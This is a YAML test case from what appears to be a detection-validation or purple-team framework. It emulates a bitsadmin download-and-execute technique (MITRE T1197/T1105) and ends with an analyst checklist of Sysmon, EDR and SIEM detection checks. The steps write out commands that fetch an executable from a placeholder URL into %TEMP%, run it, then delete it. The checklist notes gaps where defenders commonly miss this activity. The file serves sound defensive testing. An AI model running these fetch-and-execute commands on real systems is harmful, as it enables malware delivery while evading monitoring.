id: DLEXEC_010_bitsadmin
name: "Download and Execute — Bitsadmin Background Transfer"
mitre: "T1197, T1105"
category: download_execute
description: >
  Uses bitsadmin.exe to download a remote file to disk via a BITS transfer job.
  BITS (Background Intelligent Transfer Service) is a legitimate Windows service
  used by Windows Update. Attackers abuse it because bitsadmin.exe is a signed
  binary, BITS transfers survive reboots, and many products don't alert on it.
  Replace all PLACEHOLDER values.

requirements:
  os: windows
  admin: false

steps:
  - type: marker
    message: "[DLEXEC-010] Bitsadmin BITS transfer download"

  - type: exec
    binary: cmd.exe
    args: /c bitsadmin /transfer PAS_DL_Job /download /priority normal PLACEHOLDER_HTTP_URL C:\Users\%USERNAME%\AppData\Local\Temp\PLACEHOLDER_FILENAME.exe
    timeout_seconds: 60

  - type: sleep
    seconds: 20

  - type: marker
    message: "[DLEXEC-010] Execute downloaded file"

  - type: exec
    binary: cmd.exe
    args: /c C:\Users\%USERNAME%\AppData\Local\Temp\PLACEHOLDER_FILENAME.exe
    timeout_seconds: 30

  - type: sleep
    seconds: 30

  - type: marker
    message: "[DLEXEC-010] Cleanup"

  - type: exec
    binary: cmd.exe
    args: /c bitsadmin /cancel PAS_DL_Job
    timeout_seconds: 10

  - type: exec_powershell
    encoded: false
    command: |
      Remove-Item "$env:TEMP\PLACEHOLDER_FILENAME.exe" -Force -ErrorAction SilentlyContinue
    timeout_seconds: 10

analyst_checklist:
  - "Sysmon Event ID 1: bitsadmin.exe with /transfer and remote URL captured?"
  - "Sysmon Event ID 3: Network connection — note this may come from svchost.exe (BITS service) not bitsadmin.exe directly"
  - "Sysmon Event ID 11: Downloaded file in %TEMP% — hash captured?"
  - "Windows Event ID: BITS transfer events in Microsoft-Windows-Bits-Client/Operational log — present in SIEM?"
  - "EDR: Alert on bitsadmin.exe creating a transfer job to external URL?"
  - "EDR: Downloaded file executed from Temp — parent chain captured?"
  - "EDR: Did EDR attribute the download to bitsadmin or to svchost (BITS)?"
  - "SIEM: BITS operational log ingested? This is commonly missed."
  - "Rule opportunity: bitsadmin.exe with /transfer and external URL in commandline"
  - "Rule opportunity: BITS transfer job created with destination in user-writable path"
  - "Rule opportunity: executable spawned from %TEMP% or %APPDATA% by cmd.exe"
  - "Gap check: BITS transfers via svchost may not be attributed to bitsadmin.exe — check what your EDR actually logs as the source process."
